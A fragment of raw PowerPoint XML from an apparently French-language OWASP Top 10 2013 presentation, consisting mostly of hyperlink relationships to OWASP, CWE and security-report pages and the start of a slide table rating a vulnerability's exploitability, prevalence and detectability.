Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.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en.wikipedia.org/wiki/Bcryp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Testing_for_SSL-TLS" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.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Path_Traversal" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Guide_to_Authorization" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><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hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html"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Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forced_browsing"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Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)"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www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRFTester" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRF" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRFGuard"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cve.mitre.org/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sonatype.com/content/download/1025/10060/file/sonatype_executive_security_brief_final.pdf" TargetMode="Externa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hyperlink" Target="http://en.wikipedia.org/wiki/Open_source_software_security" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection"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cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.troyhunt.com/2011/12/owasp-top-10-for-net-developers-part-10.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Open_redirect" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/URL-Redirector-Abuse" TargetMode="Externa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notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag24.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Projects" TargetMode="External"/><Relationship Id="rId9"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Code_Review_Guide" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://h3xstream.github.com/find-sec-bugs/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://findbugs.sourceforge.net/index.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://code.google.com/p/zaproxy/wiki/HelpStartConceptsAscan" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag25.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_O2_Platform" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Live_CD_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ZAP" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Orizon_Project"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Category:OWASP_Code_Crawler" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebScarab"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OWASP-TopTen@lists.owasp.org" TargetMode="Externa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hyperlink" Target="mailto:dave.wichers@owasp.org" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2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ags" Target="../tags/tag27.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2010" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top10"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projects.webappsec.org/Information-Leakage" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide20.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/uploads/downloads/2011/09/ExpressionLanguageInjection.pdf" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-A3" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag28.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Application_Denial_of_Service" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ApplicationLayerIntrustionDetection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Race_Conditions_(OWASP-AT-010)" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://projects.webappsec.org/Insufficient+Anti-automation" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Clickjacking" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-A6"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hyperlink" Target="mailto:dave.wichers@owasp.org" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:owasp-topten@list.owasp.org"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hyperlink" Target="https://www.owasp.org/index.php/Industry:Citations" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/"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ASVS" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hpenterprisesecurity.com/collateral/whitepaper/HP2012CyberRiskReport_0313.pdf" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/spiderlabs/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto1.wdp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://info.veracode.com/rs/veracode/images/VERACODE-SOSS-V4.PDF" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hpenterprisesecurity.com/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.softtek.com/webdocs/special_pdfs/WP-State-of-the-art-2013.pdf" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.softtek.com/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.veracode.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustwave.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.mindedsecurity.com/2013/02/real-life-vulnerabilities-statistics.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasptop10.googlecode.com/files/WPstats_winter11_11th.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ruggedsoftware.org/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www2.trustwave.com/rs/trustwave/images/2013-Global-Security-Report.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mindedsecurity.com/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.whitehatsec.com/"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa302419.aspx" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide4.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://fairwiki.riskmanagementinsight.com/"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hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10"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Command_Injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide6.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Validator.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XXE" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/564.htm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Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/287.html" TargetMode="Externa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hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Referenc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ASVS" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_fixation" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Authenticato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Z:\dwichers\Documents\OWASP\OWASP Top 10-2013\Covers\TopTen_front_2013-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858000" cy="91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6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4021637419"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="956447"/>
          <a:ext cx="6858000" cy="2663892"/>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8989">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r>
              <a:tr h="399463">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>?</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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Mise</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> en oeuvre </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MOYENNE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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prévalence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>TRES REPANDUE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algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Détection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>FACILE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MODÉRÉ</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82104">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="just">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>quelqu’un</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pouvant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>transmettre</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>données</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> non </a:t>
                      </a:r>
                      <a:r>
